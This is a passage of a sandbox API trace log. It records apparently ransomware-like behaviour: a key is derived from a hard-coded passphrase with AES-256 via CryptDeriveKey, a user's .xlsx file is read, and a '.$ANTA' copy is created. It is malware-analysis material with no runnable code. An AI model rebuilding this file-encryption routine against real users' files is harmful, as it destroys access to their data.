lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.788] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.788] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.788] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.788] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0075.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca490, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0075.788] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0075.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0075.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0075.788] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0075.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0075.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0075.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0075.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca880, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0075.789] CryptHashData (hHash=0x41ac200, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0075.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.789] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0075.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca760, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0075.789] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac200, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0075.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0075.789] CryptDestroyHash (hHash=0x41ac200) returned 1 [0075.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0075.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0075.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0075.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0075.790] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0075.790] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0075.790] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0075.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0075.791] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\aOtbGAAYxtk159gxW.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\aotbgaayxtk159gxw.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0075.791] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.791] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0075.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0075.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0075.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0075.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0075.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0075.792] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0075.792] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0075.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0075.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0075.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0075.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0075.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0075.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e298 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0075.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0075.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e298 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0075.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0075.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0075.793] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0075.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0075.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0075.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0075.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0075.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0075.794] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\aOtbGAAYxtk159gxW.xlsx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\aotbgaayxtk159gxw.xlsx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0075.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0075.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0075.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0075.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0075.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0075.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0075.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.794] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0075.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0075.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0075.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0075.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0075.795] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0075.795] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0075.795] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0075.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0075.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0075.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0075.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0075.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e07020 [0075.799] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0075.799] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0075.803] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x2292, lpOverlapped=0x0) returned 1 [0075.803] ReadFile (in: hFile=0x298, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0075.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0075.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0075.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0075.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12292) returned 0x440b3b8 [0075.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e07020 | out: hHeap=0x1780000) returned 1 [0075.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0075.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0075.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0075.808] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0075.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.808] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x12292) returned 0x441d658 [0075.809] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0075.809] 